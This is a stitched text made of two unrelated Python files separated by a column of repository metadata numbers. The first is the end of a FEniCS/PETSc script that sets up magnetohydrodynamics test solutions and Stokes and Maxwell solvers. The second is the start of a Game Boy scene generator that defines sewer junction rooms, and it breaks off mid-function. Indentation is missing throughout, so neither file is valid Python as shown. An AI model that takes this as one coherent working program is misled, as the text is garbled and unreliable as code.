# print "\n\n\nL limits \n\n"
# print sy.limit(L1, rho,0), sy.limit(sy.limit(L1, phi,0),rho,0)
# print sy.limit(L11, rho,0), sy.limit(sy.limit(L11, phi,0),rho,0)
# print "\n", sy.limit(L2, rho,0), sy.limit(sy.limit(L2, phi,0),rho,0)
# print sy.limit(L22, rho,0), sy.limit(sy.limit(L22, phi,0),rho,0)
# print "\n\n\nA limits \n\n"
# print sy.limit(A1, rho,0), sy.limit(sy.limit(A1, phi,0),rho,0)
# print sy.limit(A11, rho,0), sy.limit(sy.limit(A11, phi,0),rho,0)
# print "\n", sy.limit(A2, rho,0), sy.limit(sy.limit(A2, phi,0),rho,0)
# print sy.limit(A22, rho,0), sy.limit(sy.limit(A22, phi,0),rho,0)
# print "\n\n\nP limits \n\n"
# print sy.limit(P1, rho,0), sy.limit(sy.limit(P1, phi,0),rho,0)
# print sy.limit(P11, rho,0), sy.limit(sy.limit(P11, phi,0),rho,0)
# print "\n", sy.limit(P2, rho,0), sy.limit(sy.limit(P2, phi,0),rho,0)
# print sy.limit(P22, rho,0), sy.limit(sy.limit(P22, phi,0),rho,0)
# print "\n\n\nC limits \n\n"
# print sy.limit(C1, rho,0), sy.limit(sy.limit(C1, phi,0),rho,0)
# print sy.limit(C11, rho,0), sy.limit(sy.limit(C11, phi,0),rho,0)
# print "\n", sy.limit(C2, rho,0), sy.limit(sy.limit(C2, phi,0),rho,0)
# print sy.limit(C22, rho,0), sy.limit(sy.limit(C22, phi,0),rho,0)
# print "\n\n\nR limits \n\n"
# print sy.limit(R1, rho,0), sy.limit(sy.limit(R1, phi,0),rho,0)
# print sy.limit(R11, rho,0), sy.limit(sy.limit(R11, phi,0),rho,0)
# print "\n", sy.limit(R2, rho,0), sy.limit(sy.limit(R2, phi,0),rho,0)
# print sy.limit(R22, rho,0), sy.limit(sy.limit(R22, phi,0),rho,0)
# print "N\n\n\nS limits \n\n"
# print sy.limit(NS1, rho,0), sy.limit(sy.limit(NS1, phi,0),rho,0)
# print sy.limit(NS11, rho,0), sy.limit(sy.limit(NS11, phi,0),rho,0)
# print "\n", sy.limit(NS2, rho,0), sy.limit(sy.limit(NS2, phi,0),rho,0)
# print sy.limit(NS22, rho,0), sy.limit(sy.limit(NS22, phi,0),rho,0)
# print "\n\n\nM limits \n\n"
# print sy.limit(M1, rho,0), sy.limit(sy.limit(M1, phi,0),rho,0)
# print sy.limit(M11, rho,0), sy.limit(sy.limit(M11, phi,0),rho,0)
# print "\n", sy.limit(M2, rho,0), sy.limit(sy.limit(M2, phi,0),rho,0)
# print sy.limit(M22, rho,0), sy.limit(sy.limit(M22, phi,0),rho,0)
# print "\n\n\Fluid limits \n\n"
# print sy.limit(u, rho,0), sy.limit(sy.limit(u, phi,0),rho,0)
# print sy.limit(v, rho,0), sy.limit(sy.limit(v, phi,0),rho,0)
# print sy.limit(p, rho,0), sy.limit(sy.limit(p, phi,0),rho,0)
# print "\n\n\nVelocity limits \n\n"
# print sy.limit(b, rho,0), sy.limit(sy.limit(b, phi,0),rho,0)
# print sy.limit(d, rho,0), sy.limit(sy.limit(d, phi,0),rho,0)
# print sy.limit(r, rho,0), sy.limit(sy.limit(r, phi,0),rho,0)
# ssss
# graduu0 = Expression(sy.ccode(sy.diff(u, rho) + (1./rho)*sy.diff(u, phi)))
graduu0 = Expression((sy.ccode(sy.diff(u, rho)),sy.ccode(sy.diff(v, rho))))
Laplacian = Expression((sy.ccode(L11),sy.ccode(L22)))
Advection = Expression((sy.ccode(A11),sy.ccode(A22)))
gradPres = Expression((sy.ccode(P11),sy.ccode(P22)))
CurlCurl = Expression((sy.ccode(C11),sy.ccode(C22)))
gradR = Expression((sy.ccode(R11).replace('M_PI','pi'),sy.ccode(R22).replace('M_PI','pi')))
NS_Couple = Expression((sy.ccode(NS11),sy.ccode(NS22)))
M_Couple = Expression((sy.ccode(M11),sy.ccode(M22)))
# ignore this! Just removes the singularity (atan2(0,0) = NaN) and makes all functions zero at the origin
class u0(Expression):
def __init__(self, mesh, uu0):
self.mesh = mesh
self.u0 = uu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
# print theta
if theta < 0:
theta += 2*np.pi
values[0] = self.u0(r, theta)[0]
values[1] = self.u0(r,theta)[1]
def value_shape(self):
return (2,)
class gradu0(Expression):
def __init__(self, mesh, graduu0):
self.mesh = mesh
self.gradu0 = graduu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values = self.gradu0(r,theta)
class p0(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
def eval(self, values, x):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
class p0Vec(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
def eval(self, values, x):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
# def value_shape(self):
# return (1,)
class b0(Expression):
def __init__(self, mesh, bu0):
self.mesh = mesh
self.b0 = bu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.b0(r, theta)[0]
values[1] = self.b0(r,theta)[1]
# print values
def value_shape(self):
return (2,)
class r0(Expression):
def __init__(self, mesh, element=None):
self.mesh = mesh
def eval(self, values, x):
values[0] = 1.0
# def value_shape(self):
# return ( )
class F_NS(Expression):
def __init__(self, mesh, Laplacian, Advection, gradPres, NS_Couple, params):
self.mesh = mesh
self.Laplacian = Laplacian
self.Advection = Advection
self.gradPres = gradPres
self.NS_Couple = NS_Couple
self.params = params
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.Advection(r,theta)[0] - self.params[0]*self.NS_Couple(r,theta)[0]
values[1] = self.Advection(r,theta)[1] - self.params[0]*self.NS_Couple(r,theta)[1]
# ssss
# print values
def value_shape(self):
return (2,)
class F_S(Expression):
def __init__(self, mesh, Laplacian, gradPres, params):
self.mesh = mesh
self.Laplacian = Laplacian
self.gradPres = gradPres
self.params = params
def eval_cell(self, values, x, ufc_cell):
values[0] = 0
values[1] = 0
# print r, theta, self.Laplacian(r,theta)
def value_shape(self):
return (2,)
# params[1]*params[0]*CurlCurl+gradR -params[0]*M_Couple
class F_M(Expression):
def __init__(self, mesh, CurlCurl, gradR ,M_Couple, params):
self.mesh = mesh
self.CurlCurl = CurlCurl
self.gradR = gradR
self.M_Couple = M_Couple
self.params = params
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = - self.params[0]*self.M_Couple(r,theta)[0]
values[1] = - self.params[0]*self.M_Couple(r,theta)[1]
def value_shape(self):
return (2,)
class F_MX(Expression):
def __init__(self, mesh):
self.mesh = mesh
def eval_cell(self, values, x, ufc_cell):
values[0] = 0.0
values[1] = 0.0
def value_shape(self):
return (2,)
class Neumann(Expression):
def __init__(self, mesh, pu0, graduu0, params, n):
self.mesh = mesh
self.p0 = pu0
self.gradu0 = graduu0
self.params = params
self.n = n
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 2.0
values[1] = 0.0
else:
# print x[0], x[1]
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
# cell = Cell(self.mesh, ufc_cell.index)
# print ufc_cell
# n = cell.normal(ufc_cell.local_facet)
# n = FacetNormal(self.mesh)
# print self.n
# sss
values[0] = (self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
# print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
values[1] = -(self.params[0]*self.gradu0(r,theta)[1])
def value_shape(self):
return (2,)
# class NeumannGrad(Expression):
# def __init__(self, mesh, pu0, graduu0, params, n):
# self.mesh = mesh
# self.p0 = pu0
# self.gradu0 = graduu0
# self.params = params
# self.n = n
# def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 2.0
# values[1] = 0.0
# else:
# # print x[0], x[1]
# r = sqrt(x[0]**2 + x[1]**2)
# theta = np.arctan2(x[1],x[0])
# if theta < 0:
# theta += 2*np.pi
# # cell = Cell(self.mesh, ufc_cell.index)
# # print ufc_cell
# # n = cell.normal(ufc_cell.local_facet)
# # n = FacetNormal(self.mesh)
# # print self.n
# # sss
# values[0] = -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
# # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
# values[1] = (self.params[0]*self.gradu0(r,theta)[1])
# def value_shape(self):
# return (2,)
u0 = u0(mesh, uu0)
p0 = p0(mesh, pu0)
p0vec = p0Vec(mesh, pu0)
b0 = b0(mesh, bu0)
r0 = r0(mesh)
F_NS = F_NS(mesh, Laplacian, Advection, gradPres, NS_Couple, params)
F_M = F_M(mesh, CurlCurl, gradR, M_Couple, params)
F_MX = F_MX(mesh)
F_S = F_S(mesh, Laplacian, gradPres, params)
gradu0 = gradu0(mesh, graduu0)
Neumann = Neumann(mesh, pu0, graduu0, params, FacetNormal(mesh))
# NeumannGrad = NeumannGrad(mesh, p0, graduu0, params, FacetNormal(mesh))
return u0, p0, b0, r0, F_NS, F_M, F_MX, F_S, gradu0, Neumann, p0vec
# Sets up the initial guess for the MHD problem
def Stokes(V, Q, F, u0, p0, gradu0, params,boundaries, domains):
parameters['reorder_dofs_serial'] = False
W = V*Q
IS = MO.IndexSet(W)
mesh = W.mesh()
ds = Measure('ds', domain=mesh, subdomain_data=boundaries)
dx = Measure('dx', domain=mesh)
(u, p) = TrialFunctions(W)
(v, q) = TestFunctions(W)
n = FacetNormal(W.mesh())
a11 = params[2]*inner(grad(v), grad(u))*dx('everywhere')
a12 = -div(v)*p*dx('everywhere')
a21 = -div(u)*q*dx('everywhere')
a = a11+a12+a21
L = inner(v, F)*dx('everywhere') + inner(gradu0,v)*ds(2)
def boundary(x, on_boundary):
return on_boundary
bcu = DirichletBC(W.sub(0), u0, boundaries, 1)
A, b = assemble_system(a, L, bcu)
A, b = CP.Assemble(A, b)
u = b.duplicate()
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('preonly')
pc.setType('lu')
OptDB = PETSc.Options()
OptDB['pc_factor_mat_solver_package'] = "mumps"
OptDB['pc_factor_mat_ordering_type'] = "rcm"
ksp.setFromOptions()
# print b.array
# bbb
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
u_k = Function(V)
p_k = Function(Q)
u_k.vector()[:] = u.getSubVector(IS[0]).array
p_k.vector()[:] = u.getSubVector(IS[1]).array
ones = Function(Q)
ones.vector()[:]=(0*ones.vector().array()+1)
p_k.vector()[:] += -assemble(p_k*dx('everywhere'))/assemble(ones*dx('everywhere'))
return u_k, p_k
def Maxwell(V, Q, F, b0, r0, params, boundaries):
parameters['reorder_dofs_serial'] = False
W = V*Q
IS = MO.IndexSet(W)
mesh = W.mesh()
# dx = Measure('dx', domain=mesh)
print params
(u, p) = TrialFunctions(W)
(v, q) = TestFunctions(W)
n = FacetNormal(W.mesh())
a11 = params[1]*params[2]*inner(curl(v), curl(u))*dx('everywhere')
a21 = inner(u,grad(q))*dx('everywhere')
a12 = inner(v,grad(p))*dx('everywhere')
L = inner(v, F)*dx('everywhere')
a = a11+a12+a21
def boundary(x, on_boundary):
return on_boundary
bcb = DirichletBC(W.sub(0), b0, boundaries, 1)
bcr = DirichletBC(W.sub(1), r0, boundaries, 1)
bc = [bcb, bcr]
A, b = assemble_system(a, L, bc)
A, b = CP.Assemble(A, b)
u = b.duplicate()
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('preonly')
pc.setType('lu')
OptDB = PETSc.Options()
OptDB['pc_factor_mat_solver_package'] = "mumps"
OptDB['pc_factor_mat_ordering_type'] = "rcm"
ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
u_k = Function(V)
p_k = Function(Q)
u_k.vector()[:] = u.getSubVector(IS[0]).array
p_k.vector()[:] = u.getSubVector(IS[1]).array
# print u_k.vector().array()
# sss
return u_k, p_k
| 34.957389
| 199
| 0.519762
| 5,983
| 38,558
| 3.29283
| 0.054822
| 0.072484
| 0.02071
| 0.037968
| 0.91772
| 0.911781
| 0.902898
| 0.902898
| 0.897112
| 0.894878
| 0
| 0.056333
| 0.307122
| 38,558
| 1,102
| 200
| 34.989111
| 0.68109
| 0.30554
| 0
| 0.868167
| 0
| 0
| 0.013346
| 0.004159
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.016077
| null | null | 0.001608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ea80fa03c40a53d8597d2644176d798c1f5c2a49
| 20,085
|
py
|
Python
|
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | 3
|
2021-08-07T03:38:02.000Z
|
2021-09-17T14:33:27.000Z
|
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
# Generated Scene Functions
# Junctions.py
from rom_generator import generator
from rom_generator import script_functions as script
import random
test_generation_destination_path = "../gbprojects/generated_export_test_Junctions/"
def scene_generation():
sprite_sheet_data = [
generator.makeSpriteSheet('actor.png', name='actor', type='actor', frames=3),
generator.makeSpriteSheet('actor_animated.png', name='actor_animated', type='actor_animated', frames=6),
generator.makeSpriteSheet('static.png', name='static', type='static', frames=1)]
def findSpriteByName(sprite_name):
'''
Returns first sprite that matches the name given.
'''
try:
return [s for s in sprite_sheet_data if (s['name'] == sprite_name)][0]
except:
return None
def getBySceneLabel(scene_label):
'''
This is mostly here so we can get the matching scene from the original
template data. As used here it just grabs the first scene that was made
from that template, so if the template is used more than once it won't
behave as expected and you should generate a proper relationship instad.
'''
s_id = generator.getSceneIdByLabel(scene_label)
if s_id == None:
return '<♔' + scene_label + '♔>'
return s_id
def scene_gen_corner_00001(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 8, 0, 8, 1)
trigger_01 = generator.makeTrigger('trigger_01', 19, 8, 1, 4)
trigger_list = []
collision_data_list = [255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 240, 15, 0, 255, 0, 240, 15, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255]
gen_scene_bkg = generator.makeBackground("link_01a.png")
gen_scene_scn = generator.makeScene("_gen_corner", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_corner_00001")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (11, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 0), 'entrance_size': (8, 1) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (17, 10), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (19, 8), 'entrance_size': (1, 4) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Sewer"]}
return scene_data
def scene_gen_junctionDown_00002(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 0, 2, 1, 6)
trigger_01 = generator.makeTrigger('trigger_01', 19, 2, 1, 6)
trigger_02 = generator.makeTrigger('trigger_02', 8, 17, 6, 1)
trigger_list = []
collision_data_list = [255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252]
gen_scene_bkg = generator.makeBackground("link_01b.png")
gen_scene_scn = generator.makeScene("_gen_junctionDown", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_junctionDown_00002")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (1, 5), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 2), 'entrance_size': (1, 6) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (17, 5), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (19, 2), 'entrance_size': (1, 6) }, 'tags': ['A'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (10, 16), 'exit_direction': 'up', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 17), 'entrance_size': (6, 1) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Sewer"]}
return scene_data
def scene_gen_JunctionLeft_00003(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 8, 0, 6, 1)
trigger_01 = generator.makeTrigger('trigger_01', 0, 8, 1, 4)
trigger_02 = generator.makeTrigger('trigger_02', 4, 17, 4, 1)
trigger_list = []
collision_data_list = [255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 0, 192, 15, 0, 252, 0, 240, 15, 0, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255]
gen_scene_bkg = generator.makeBackground("link_01c.png")
gen_scene_scn = generator.makeScene("_gen_JunctionLeft", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_JunctionLeft_00003")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (10, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 0), 'entrance_size': (6, 1) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (1, 10), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 8), 'entrance_size': (1, 4) }, 'tags': ['A'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (5, 16), 'exit_direction': 'up', 'entrance': gen_scene_scn['id'], 'entrance_location': (4, 17), 'entrance_size': (4, 1) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Sewer"]}
return scene_data
def scene_gen_JunctionUp_00004(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 8, 0, 4, 1)
trigger_01 = generator.makeTrigger('trigger_01', 0, 14, 1, 2)
trigger_02 = generator.makeTrigger('trigger_02', 19, 8, 1, 4)
trigger_list = []
collision_data_list = [255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 3, 0, 48, 0, 0, 3, 0, 48, 0, 0, 195, 255, 63, 252, 255, 192, 255, 15, 252, 255, 255, 255, 255, 255, 255]
gen_scene_bkg = generator.makeBackground("link_01d.png")
gen_scene_scn = generator.makeScene("_gen_JunctionUp", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_JunctionUp_00004")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (9, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 0), 'entrance_size': (4, 1) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (1, 15), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 14), 'entrance_size': (1, 2) }, 'tags': ['A'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (17, 10), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (19, 8), 'entrance_size': (1, 4) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Sewer"]}
return scene_data
def scene_gen_JunctionRight_00005(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 8, 0, 4, 1)
trigger_01 = generator.makeTrigger('trigger_01', 19, 8, 1, 4)
trigger_02 = generator.makeTrigger('trigger_02', 8, 17, 4, 1)
trigger_list = []
collision_data_list = [255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 0, 240, 15, 0, 255, 0, 240, 15, 0, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255]
gen_scene_bkg = generator.makeBackground("link_01e.png")
gen_scene_scn = generator.makeScene("_gen_JunctionRight", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_JunctionRight_00005")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (9, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 0), 'entrance_size': (4, 1) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (17, 10), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (19, 8), 'entrance_size': (1, 4) }, 'tags': ['A'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (9, 16), 'exit_direction': 'up', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 17), 'entrance_size': (4, 1) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
